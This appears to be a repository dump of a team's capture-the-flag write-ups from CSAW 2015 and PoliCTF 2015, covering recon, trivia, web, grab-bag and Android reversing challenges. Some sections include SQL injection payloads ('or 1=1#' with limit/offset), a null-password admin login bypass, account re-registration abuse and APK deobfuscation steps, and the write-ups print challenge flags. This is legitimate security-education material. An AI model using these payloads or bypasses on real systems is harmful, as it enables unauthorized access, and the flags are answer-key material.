16 | 17 | ![Image of 2] 18 | (./Images/teams.png) 19 | 20 | The team members aren’t listed, again, but we went through the list to look for anything that would stick out, or maybe the flag? No, but we did find a team - BrooklynT Overflow - that was listed as an NYU team and was also on the 2013 listing. 21 | 22 | ![Image of 3] 23 | (./Images/brooklyn.png) 24 | 25 | We looked this team up on CTFTime.org to see if it had a member listing or something more productive. Although Eric is clearly listed as a member of this team, we didn’t find the flag just yet. We examined the image they had associated with the team, but that turned up nothing. 26 | 27 | ![Image of 4] 28 | (./Images/logo.png) 29 | 30 | We tracked down most of the solutions they posted for the past 2 years on the CTFs they participated in and the write-ups they posted, looking for the flag. This got us nowhere. We decided to look into the team’s website. Again, we spent a lot of time examining this site - [http://www.isis.poly.edu/brooklynt-overflow](http://www.isis.poly.edu/brooklynt-overflow) - for hidden flags. The hours we spent looking at everything on this site were – to put it kindly – regrettable. Every link was followed up and the source code of each page was examined. At this point we started looking into alternatives: maybe CTF in this case was a reference to online gaming. We found out Eric was in the Poly Gaming Network club, so we went onto Steam and looked up event records for the past 2 years associated with PGN and Eric. I won’t say how much time we wasted here, but it was getting ugly. 31 | We decided to start over and re-examine the archive for 2013 and 2014. Under the Quals menu we located the Competitors listing. 32 | 33 | ![Image of 5] 34 | (./Images/competitors.png) 35 | 36 | We searched again for more NYU teams to track down. We started making a list of all the other NYU teams to follow up on when we came across the flag in plain sight! 
We had been here hours before, but didn’t make it this far down the list? Maybe we were in the wrong year? I don’t know for sure why we didn’t see this originally, I may never forgive myself for not seeing it on the first visit. Eric is real!! 37 | 38 | ![Image of 6] 39 | (./Images/flag.png) 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Julian-Cohen/Images/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Julian-Cohen/Images/google.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Julian-Cohen/Readme.md: -------------------------------------------------------------------------------- 1 | #Julian Cohen 2 | 3 | **Category:** Recon 4 | **Points:** 100 5 | **Description:** 6 | 7 | N/A 8 | 9 | ##Write-up 10 | This is as easy as it gets. Google it. 11 | 12 | ![Image of google] 13 | (./Images/google.png) 14 | 15 | In case you missed it the flag shows up on the 1st results page within the ```@HockeyInJune``` Twitter account as ```flag{f7da7636727524d8681ab0d2a072d663}``` 16 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Trivia/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #Trivia_All_Of_Them 3 | 4 | **Category:** Trivia 5 | **Points:** 10 each 6 | **Description:** trivia questions (nerd stuff) 7 | 8 | 9 | ##Write-up 10 | All the trivia challenges were solved quickly by googling around. We tried to inlude links to good resources about each topic. 11 | 12 | 13 | 14 | Trivia 1 15 | -------- 16 | Q: This family of malware has gained notoriety after anti-virus and threat intelligence companies claimed that it was being used by several Chinese military groups. 
17 | 18 | A: plugX , took a little trial and error since there are so many malware families connected to Chinese hacking groups. More information about plugx can be found at [this blackhat talk](https://www.blackhat.com/docs/asia-14/materials/Haruyama/Asia-14-Haruyama-I-Know-You-Want-Me-Unplugging-PlugX.pdf). 19 | 20 | Trivia 2 21 | -------- 22 | Q: No More Free __! 23 | 24 | A: Bugs, It's a meme starting at security conference CanSecWest, [Trail of Bits' website](http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/) 25 | 26 | Trivia 3 27 | -------- 28 | Q: This mode on x86 is generally referred to as ring -2. 29 | 30 | A: System Management Mode , this was from the best talk of BlackHat 2015 by Christopher Domas. It blew everyone's mind how you can use System Management Mode's memory space to create privilege escalation on 100,000's of Intel based devices. You can read more about it at [blackHat.com](https://www.blackhat.com/images/page-graphics-usa-15/us-15-whitepaper.png) 31 | 32 | Trivia 4 33 | -------- 34 | Q: This vulnerability occurs when the incorrect timing/sequence of events may cause a bug. 35 | 36 | A: Race Condition, this is a common problem with single threaded apps or those that are multithreaded but share common objects/files/cookies/database values/or whatever.. more detail can be found on [wikipedia](https://en.wikipedia.org/wiki/Race_condition) 37 | 38 | Trivia 5 39 | -------- 40 | Q: On Windows, loading a library and having it's code run in another process is called _ . 41 | 42 | A: DLL Injection, here's a [tutorial](http://resources.infosecinstitute.com/api-hooking-and-dll-injection-on-windows/) 43 | 44 | Trivia 6 45 | -------- 46 | Q: This Pentesting expert supplied HBO's Silicon Valley with technical advice in season 2. The flag is his twitter handle. 47 | 48 | A: A little googling on a cell phone while looking at other challenges found this one. 
Rob Fuller [Mubix!](https://twitter.com/mubix) 49 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/bid.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/bid.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/compass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/compass.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/flag.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/hidden.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/hidden.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/home.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/noop.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/noop.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/register.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/register.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/stairs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/stairs.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/tokens.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/tokens.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/tokens_after.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/tokens_after.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #K_{Stairs} 3 | 4 | **Category:** Web 5 | **Points:** 100 6 | **Description:** 7 | 8 | http://54.152.84.91 9 | 10 | ##Write-up 11 | 
Hitting the site, we are welcomed with the following: 12 | 13 | ![Image of site] 14 | (./Images/home.png) 15 | 16 | Immediately we register and start looking around. 17 | 18 | ![Image of registration] 19 | (./Images/register.png) 20 | 21 | So, straight off the bat we notice that we were given 3 tokens for registering to play and there appears to be DLC content available to help us in our conquest. After a lot of playing around and throwing things (the site was very slow and buggy at times), we noticed that if you register and then just logout and re-register it aggregates your tokens. 22 | 23 | ![Image of tokens] 24 | (./Images/tokens.png) 25 | 26 | During our recon we also noticed a hidden compass that said it costs 100 tokens. 27 | 28 | ![Image of hidden compass] 29 | (./Images/hidden.png) 30 | 31 | We wasted a lot of time here trying to buy this upgraded compass by changing the ```bid``` parameter to ```4```, as we thought perhaps it would give us an upper hand while actually playing the game. No matter what we did we were always greeted with the ```nO-oP``` message. 32 | 33 | ![Image of bid] 34 | (./Images/bid.png) 35 | 36 | ![Image of nO-oP] 37 | (./Images/noop.png) 38 | 39 | Before you comment on the number of tokens being shown above while trying to purchase a ```100``` compass, these images were taken after the fact. We had closer to ```200``` tokens available while testing and were never able to purchase this item. So moving back to collecting tokens. After we finished registering enough users, we went ahead and purchased the ```10``` token compass, a bunch of food, and headed off on our quest. 40 | 41 | ![Image of tokens_after] 42 | (./Images/tokens_after.png) 43 | 44 | ![Image of compass] 45 | (./Images/compass.png) 46 | 47 | The compass basically was boolean in nature. It would only tell you if you were going the right or wrong direction. 
We took the approach of heading in one direction until the compass told us it was no longer the correct direction, then turning to head the way the compass indicated.
/2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/intro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/intro.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/username.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/username.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/Lawn-Care-Simulator/Readme.md: -------------------------------------------------------------------------------- 1 | #Lawn Care Simulator 2 | 3 | **Category:** Web 4 | **Points:** 200 5 | **Description:** 6 | 7 | http://54.165.252.74:8089/ 8 | 9 | ##Write-up 10 | Hitting the site, we are welcomed with the following site: 11 | 12 | ![Image of site] 13 | (./Images/intro.png) 14 | 15 | After getting nowhere with the standard web attacks I started to mess with the grass feature which grew the grass little by little and giving "achievements" every so often for wasting your time. 16 | 17 | ![Image of achievement] 18 | (./Images/achievement.png) 19 | 20 | Just for fun I modified the grass to grow quickly by calling the ```grow()``` function muliple times per click. 21 | 22 | ![Image of grass] 23 | (./Images/grass.png) 24 | 25 | Ok, back to the challenge. Messing with the username/password fields I noticed that there was some client-side validation to ensure that values weren't empty upon submission. 26 | 27 | ![Image of username] 28 | (./Images/username.png) 29 | 30 | Using burp I tried a few different tests with null values like ```null:null```, ```test:null```, and finally ```admin:null```. 
The latter produced: 31 | 32 | ![Image of empty] 33 | (./Images/empty.png) 34 | 35 | ![Image of flag] 36 | (./Images/flag.png) 37 | -------------------------------------------------------------------------------- /2015/PoliCTF/Grab-Bag/Hard-Interview/IP.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Grab-Bag/Hard-Interview/IP.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Grab-Bag/Hard-Interview/Readme.md: -------------------------------------------------------------------------------- 1 | #Hard Interview 2 | 3 | **Category:** Grab Bag 4 | **Points:** 50 5 | **Description:** 6 | 7 | > interview.polictf.it:80 8 | 9 | ##Write-up 10 | 11 | >The first thing we did was netcat to the above address:port and got the following screen: 12 | > 13 | ![Image of Hard Interview hint] 14 | (./hint.tiff) 15 | 16 | >The description for the challenge is basically a quote from the movie Swordfish and we are logged in with fish@sword. The official hint is that the host is a "not so easily reachable IP" and the user is "THE username", both of which are slightly vague. 17 | 18 | >After try a few different combinations of usernames and hosts I decided to go lookup the movie clips surrounding the scene that had been quoted. The first item that struck me was the following: 19 | > 20 | ![Image of Hard Interview hint] 21 | (./IP.tiff) 22 | 23 | >The "not so easily reachable IP" of 312.5.125.233 fit the bill and when submitted the system stopped complaining about the host. 24 | 25 | >Having found the host sytem, I stayed in the same area of the movie and looked for any possible usernames that would have been submitted. 
It didn't take long (and probably shouldn't have taken the movie) to land on the following: 26 | > 27 | ![Image of Hard Interview hint] 28 | (./user.tiff) 29 | 30 | >Using ssh from the options and submitting the above values reveals the flag. 31 | > 32 | >``` 33 | >fish@sword:~$ ssh admin@312.5.125.233 34 | > flag{H4ll3_B3rry's_t0pl3ss_sc3n3_w4s_4ls0_n0t4bl3} 35 | >fish@sword:~$ 36 | >``` 37 | 38 | -------------------------------------------------------------------------------- /2015/PoliCTF/Grab-Bag/Hard-Interview/hint.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Grab-Bag/Hard-Interview/hint.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Grab-Bag/Hard-Interview/user.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Grab-Bag/Hard-Interview/user.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Reversing/Crack-Me-If-You-Can/Readme.md: -------------------------------------------------------------------------------- 1 | #Crack Me If You Can 2 | 3 | **Category:** Reversing 4 | **Points:** 100 5 | **Description:** 6 | 7 | > John bets nobody can find the passphrase to login! 8 | 9 | > GPG key: viphHowrirOmbugTudIbavMeuhacyet 10 | 11 | > [Crack Me If You Can](crack-me-if-you-can_d4e396383e3f64ec7698efaf42f7f32b.tar.gz.gpg) 12 | 13 | ##Write-up 14 | > To start, we are given an apk to reverse. The first thing I did was attempt to decompile the code. To do this I used a few different tools. The first thing we need to do is unzip the apk into a dex file. After that we can use dex2jar to convert this into a jar file. Finally, we can use luyten to open the jar and inspect the code. 
15 | 16 | >``` 17 | >$ unzip crack-me-if-you-can.apk classes.dex 18 | > Archive: crack-me-if-you-can.apk 19 | > inflating: classes.dex 20 | >$ ~/dex2jar-0.0.9.15/dex2jar.sh classes.dex 21 | > this cmd is deprecated, use the d2j-dex2jar if possible 22 | > dex2jar version: translator-0.0.9.15 23 | > dex2jar classes.dex -> classes_dex2jar.jar 24 | > Done. 25 | >$ java -jar ~/luyten-0.4.3/luyten-0.4.3.jar classes_dex2jar.jar 26 | >``` 27 | > 28 | ![Image of luyten] 29 | (./luyten.tiff) 30 | > 31 | > The first thing I noticed in the it.polictf2015 package was the string 32 | > 33 | >``` 34 | > flagging{It_cannot_be_easier_than_this} 35 | >``` 36 | > 37 | > I tried this with the correct flag{.*} format but it didn't work. After looking through the layers of classes, all of which had a.b, b.c, b.d, c.a style structures I landed on the following chunk of java. 38 | > 39 | >```java 40 | >private boolean a(final String s) { 41 | > if (s.equals(c.a(it.polictf2015.b.a(it.polictf2015.b.b(it.polictf2015.b.c(it.polictf2015.b.d(it.polictf2015.b.g(it.polictf2015.b.h(it.polictf2015.b.e(it.polictf2015.b.f(it.polictf2015.b.i(c.c(c.b(c.d(this.getString(2131492920)))))))))))))))) { 42 | > Toast.makeText(this.getApplicationContext(), (CharSequence)this.getString(2131492924), 1).show(); 43 | > return true; 44 | > } 45 | > return false; 46 | > } 47 | >``` 48 | > This looks promising, but we need to find out what the following string is. 49 | >```java 50 | > this.getString(2131492920) 51 | >``` 52 | > 53 | > Already having the android-sdk installed, I went into the build-tools directory and grepped the output from aapt looking for the hex representation of the string reference. 
54 | > 55 | >``` 56 | >$ ./aapt d --values resources ~/Dropbox/crack-me-if-you-can.apk | grep 0x7f0c0038 57 | > spec resource 0x7f0c0038 it.polictf2015:string/àè: flags=0x00000000 58 | > resource 0x7f0c0038 it.polictf2015:string/àè: t=0x03 d=0x0000017b (s=0x0008 r=0x00) 59 | >``` 60 | > 61 | > We can see that we got a hit on the it.polictf2015:string/àè string. Now to get the strings.xml file. For this, we'll use apktool to open up the apk. 62 | > 63 | >``` 64 | >$ java -jar apktool_2.0.0.jar d ~/Dropbox/crack-me-if-you-can.apk 65 | >I: Using Apktool 2.0.0 on crack-me-if-you-can.apk 66 | >I: Loading resource table... 67 | >I: Decoding AndroidManifest.xml with resources... 68 | >I: Loading resource table from file: /Users/haylesr/Library/apktool/framework/1.apk 69 | >I: Regular manifest package... 70 | >I: Decoding file-resources... 71 | >I: Decoding values */* XMLs... 72 | >I: Baksmaling classes.dex... 73 | >I: Copying assets and libs... 74 | >I: Copying unknown files... 75 | >I: Copying original files... 76 | >``` 77 | > 78 | > In the res/values directory we find strings.xml. Below is a snippet with the important stuff. 79 | > 80 | >```xml 81 | > 82 | > 83 | > Crack me! 84 | > Allow Ad to store image in Picture gallery? 85 | > Save image 86 | > Buy with Google 87 | > Incorrect! 88 | > [[c%l][c{g}[%{%Mc%spdgj=]T%aat%=O%bRu%sc]c%ti[o%n=Wcs%=No[t=T][hct%=buga[d=As%=W]e=T%ho[u%[%g]h%t[%}% 89 | > [[c%l][c{g}[%{%Mc%spdggfdj=]T%aat%=O%bRu%sc]c%ti[o[t=T][hct%=budsga[d=As%=W]e=T%ho[u%[%g]h%t[%}%T[]e3 90 | > Your device looks good :) 91 | > Empty! 92 | > Good to go! =) 93 | > "Nice emulator, I'm watching you ;)" 94 | > Hello! 
95 | > 96 | >``` 97 | > 98 | > We see our string reference matches up and we are left with the following: 99 | > 100 | >``` 101 | > [[c%l][c{g}[%{%Mc%spdggfdj=]T%aat%=O%bRu%sc]c%ti[o[t=T][hct%=budsga[d=As%=W]e=T%ho[u%[%g]h%t[%}%T[]e3 102 | >``` 103 | > 104 | > I turned to python to recreate the b.java and c.java that we were able to see using the luyten tool. These classes basically just did a bunch of replacements on a given String value. 105 | 106 | >```python 107 | >def ca(text): 108 | > return text.replace("aa","ca") 109 | >def cb(text): 110 | > return text.replace("aat","his") 111 | >def cc(text): 112 | > return text.replace("buga","Goo") 113 | >def cd(text): 114 | > return text.replace("spdgj","yb%e") 115 | >def ba(text): 116 | > return text.replace("c","a") 117 | >def bb(text): 118 | > return text.replace("%","") 119 | >def bc(text): 120 | > return text.replace("[","") 121 | >def bd(text): 122 | > return text.replace("]","") 123 | >def be(text): 124 | > return text.replace("\\{","") 125 | >def bf(text): 126 | > return text.replace("\\}","") 127 | >def bg(text): 128 | > return text.replace("c","f") 129 | >def bh(text): 130 | > return text.replace("R","f") 131 | >def bi(text): 132 | > return text.replace("=","_") 133 | > 134 | >flag="[[c%l][c{g}[%{%Mc%spdgj=]T%aat%=O%bRu%sc]c%ti[o%n=Wcs%=No[t=T][hct%=buga[d=As%=W]e=T%ho[u%[%g]h%t[%}%" 135 | >print ca(ba(bb(bc(bd(bg(bh(be(bf(bi(cc(cb(cd(flag))))))))))))) 136 | >``` 137 | > 138 | > Running this code produced the following: 139 | > 140 | >``` 141 | >$ python ~/Dropbox/crackme.py 142 | > flf{g}{Mfybe_This_Obfusfftion_Wfs_Not_Thft_Good_As_We_Thought} 143 | >``` 144 | > 145 | > Bravo! We got the flag, but with some obvious mistakes. I'm sure I screwed up my python somewhere, but the flag is close enough that we can translate it to the correct value. I never went back to find the mistake. We submitted the flag and moved on. 
146 | > 147 | >``` 148 | > flag{Maybe_This_Obfuscation_Was_Not_That_Good_As_We_Thought} 149 | >``` 150 | -------------------------------------------------------------------------------- /2015/PoliCTF/Reversing/Crack-Me-If-You-Can/crack-me-if-you-can_d4e396383e3f64ec7698efaf42f7f32b.tar.gz.gpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Reversing/Crack-Me-If-You-Can/crack-me-if-you-can_d4e396383e3f64ec7698efaf42f7f32b.tar.gz.gpg -------------------------------------------------------------------------------- /2015/PoliCTF/Reversing/Crack-Me-If-You-Can/crackme.py: -------------------------------------------------------------------------------- 1 | def ca(text): 2 | return text.replace("aa","ca") 3 | 4 | def cb(text): 5 | return text.replace("aat","his") 6 | 7 | def cc(text): 8 | return text.replace("buga","Goo") 9 | 10 | def cd(text): 11 | return text.replace("spdgj","yb%e") 12 | 13 | def ba(text): 14 | return text.replace("c","a") 15 | 16 | def bb(text): 17 | return text.replace("%","") 18 | 19 | def bc(text): 20 | return text.replace("[","") 21 | 22 | def bd(text): 23 | return text.replace("]","") 24 | 25 | def be(text): 26 | return text.replace("\\{","") 27 | 28 | def bf(text): 29 | return text.replace("\\}","") 30 | 31 | def bg(text): 32 | return text.replace("c","f") 33 | 34 | def bh(text): 35 | return text.replace("R","f") 36 | 37 | def bi(text): 38 | return text.replace("=","_") 39 | 40 | flag="[[c%l][c{g}[%{%Mc%spdgj=]T%aat%=O%bRu%sc]c%ti[o%n=Wcs%=No[t=T][hct%=buga[d=As%=W]e=T%ho[u%[%g]h%t[%}%" 41 | 42 | print ca(ba(bb(bc(bd(bg(bh(be(bf(bi(cc(cb(cd(flag))))))))))))) -------------------------------------------------------------------------------- /2015/PoliCTF/Reversing/Crack-Me-If-You-Can/luyten.tiff: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Reversing/Crack-Me-If-You-Can/luyten.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/9.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/9.jpg -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/Readme.md: -------------------------------------------------------------------------------- 1 | #John the Referee 2 | 3 | **Category:** Web 4 | **Points:** 150 5 | **Description:** 6 | 7 | > John is one of the most famous referee and security experts in the world. He loves encryption and his referee uniforms. You can find them on his online store. Unfortuneately his best uniform is not on sale for anyone. I know that it is available only on invitation. I want that uniform! 8 | 9 | > referee.polictf.it 10 | 11 | ##Write-up 12 | > Full disclosure, we only got this challenge after that CTF had ended, but our approach was slightly different in the end and I decided to write it up anyway. 13 | > 14 | > Starting out we were greeted with the main page in which we can see an array of uniforms. 15 | > 16 | >![Image of main] 17 | (./main.JPG) 18 | > 19 | > There were really only two different areas to look at.> 20 | > 1) You could click on a uniform and you were brought to something similiar to the following (depending on what uniform you chose). 21 | >``` 22 | > http://referee.polictf.it/uniform/3 23 | >``` 24 | > 2) You could search or a uniform where you were brought to a page with a hash like value in the path. Single quotes and other characters we also escaped when submitted. 
25 | > 26 | ![Image of normal] 27 | (./normal.JPG) 28 | > 29 | > Looking at the first option first, we used burp intruder to loop through uniform values looking for anything that didn't show up on the main page. What we found was that only 1-8 and 10 had uniforms. Obviously #9 stuck out and seemed to be the goal. We then turned to the static images where we were able to see the 9th uniform. 30 | > 31 | ![Image of 9] 32 | (./9.jpg) 33 | > 34 | > Now that we have confirmed that this was our target we needed to find a way to get to that uniform. 35 | > 36 | > Going back to option two, we messed around with the search page and were able to figure out that you could manipulate the first character in the search box by changing the begining of the hash like value in the path. Again, being honest, this is where we stopped. Having said that, you can use that information to edit the escape character for SQLi payloads. 37 | > 38 | > Starting with ```' or 1=1#``` in an attempt to return all uniforms we see that we had a valid query in that data returned, but it looks like we are only getting the first uniform. 39 | > 40 | ![Image of or logic] 41 | (./or_logic.JPG) 42 | > 43 | > We then tried to get a ```UNION SELECT``` SQLi to work and were able to determine that only one column was being selected, however, we never were able to get the full statement to execute. With that being said, we can just continue with the ```' or 1=1#``` query, but select which row we want to actually be displayed using ```' or 1=1 limit 1 offset 9#```. This is basically saying select everything from the database but only return the 9th record. This returns the uniform seen at ```http://referee.polictf.it/uniform/10```, so we must be off by one. 
Changing the query yields: 44 | > 45 | ![Image of flag] 46 | (./flag.JPG) 47 | -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/flag.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/flag.JPG -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/main.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/main.JPG -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/normal.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/normal.JPG -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/or_logic.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/or_logic.JPG -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/3.jpg -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/Crop.tiff: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/Crop.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/QR.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/QR.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/Readme.md: -------------------------------------------------------------------------------- 1 | #John the Traveller 2 | 3 | **Category:** Web 4 | **Points:** 100 5 | **Description:** 6 | 7 | > Holidays are here! But John still hasn't decided where to spend them and time is running out: flights are overbooked and prices are rising every second. Fortunately, John just discovered a website where he can book last second flight to all the European capital; however, there's no time to waste, so he just grabs his suitcase and thanks to his new smartphone he looks the city of his choice up while rushing to the airport. There he goes! Flight is booked so... hauskaa lomaa! 8 | 9 | > traveller.polictf.it 10 | 11 | ##Write-up 12 | > The first clue came at the end of the description. Google translate tells us that hauskaa lomaa is Finnish for happy vacation. A quick lookup of European capitals shows Helsinki as the capital of Finland. 13 | > 14 | > Heading to the site we are greeted with the following page: 15 | > 16 | >![Image of traveller] 17 | (./Traveller.tiff) 18 | > 19 | > After searching for Helsinki we get a list of possible flights that change each time we search. We did notice that the currency for Helsinki was in ```px```, whereas the rest of the options seemed to be ```EUR```. 
That should have stood out, but we missed it at first. After poking around the site we noticed that if you zoomed in on the image of Venice that there appeared to be a broken up QR code in it. We originally attempted to use Gimp to pull the blocks out, but none of us were that experienced with it and it was too sloppy to piece back together. We ended up finding [ImageSplitter.net](imagesplitter.net) which turned out to be perfect. 20 | > 21 | >![Image of venice] 22 | (./Venice.tiff) 23 | > 24 | > We went through the image methodically cropping out 100 x 100 blocks of QR code. 25 | > 26 | >![Image of block] 27 | (./block.png) 28 | > 29 | > After getting what we thought was all 36 blocks, we started the painfull process of putting the puzzle back together. We had a few duplicated blocks and ended up missing one completely, but got the final QR code back. 30 | > 31 | >![Image of QR code] 32 | (./QR.tiff) 33 | > 34 | > It took a few iterations to get the blocks placed correctly, but when we did we were able to scan the QR code even with the missing block and get our flag. 35 | > 36 | >![Image of flag] 37 | (./flag.tiff) 38 | > 39 | > It turns out that a much much easier way to do this would have been to use the Chrome dev tools to set the screen size to a specified pixel height and width (i.e. Helsinki flight currency px). Getting the parameters lined up with the flight costs renders our QR code in all of it's glory with much less pain. Lesson learned. 
40 | > 41 | >![Image of Chrome dev tools] 42 | (./px.tiff) 43 | -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/Traveller.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/Traveller.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/Venice.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/Venice.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/block.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/block.png -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/flag.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/flag.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/px.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/px.tiff -------------------------------------------------------------------------------- /2016/BostonKeyParty/Crypto/des-ofb/Images/601px-OFB_decryption.png: 
